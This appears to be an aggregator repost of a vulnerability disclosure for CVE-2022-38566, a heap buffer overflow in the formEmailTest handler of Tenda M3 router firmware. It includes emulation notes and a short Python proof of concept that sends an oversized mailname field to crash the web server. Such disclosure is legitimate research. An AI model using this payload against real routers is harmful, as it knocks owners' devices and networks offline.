Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-38566: Vuln/Tenda M3/formEmailTest-mailname at main · xxy1126/Vuln

Tenda M3 V1.0.0.12(4856) was discovered to contain a heap buffer overflow vulnerability in the function formEmailTest. This vulnerability allows attackers to cause a Denial of Service (DoS) via the mailname parameter.

CVE
#vulnerability#web#dos#perl#buffer_overflow

Tenda M3 contains heap buffer Overflow Vulnerability****overview

  • type: heap buffer overflow vulnerability

  • supplier: Tenda https://www.tenda.com

  • product: TendaM3 https://www.tenda.com.cn/product/M3.html

  • firmware download: https://www.tenda.com.cn/download/detail-3133.html

  • affect version: TendaM3 v1.0.0.12(4856)

Description****1. Vulnerability Details

the httpd in directory /bin has a heap buffer overflow. The vunlerability is in fucntion formEmailTest

It calls malloc(0x28Cu) to allocate heap buffer, and it copies POST parameter mailname to heap buffer.

v3 is the length of mailname, but it doesn’t limit it. so if v3>0x28C, the memcpy(v1, v2, v3) will cause heap buffer overflow

but it can cause segmentation fault when execute memcpy(v1, v2, v3)

2. Recurring loopholes and POC

use qemu-arm-static to run the httpd, we need to patch it before run.

  • in main function, The ConnectCfm function didn’t work properly, so I patched it to NOP
  • The R7WebsSecurityHandler function is used for permission control, and I’ve modified it to access URLs that can only be accessed after login

poc of DOS(deny of service)

import requests

data = { "mailname": "@"+"a"*0x600, "mailpwd": “a” } cookies = { "user": “admin” } res = requests.post("http://127.0.0.1/goform/testEmail", data=data, cookies=cookies) print(res.content)

we can see the size of dest is 0x291 and size of src is 0x600

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907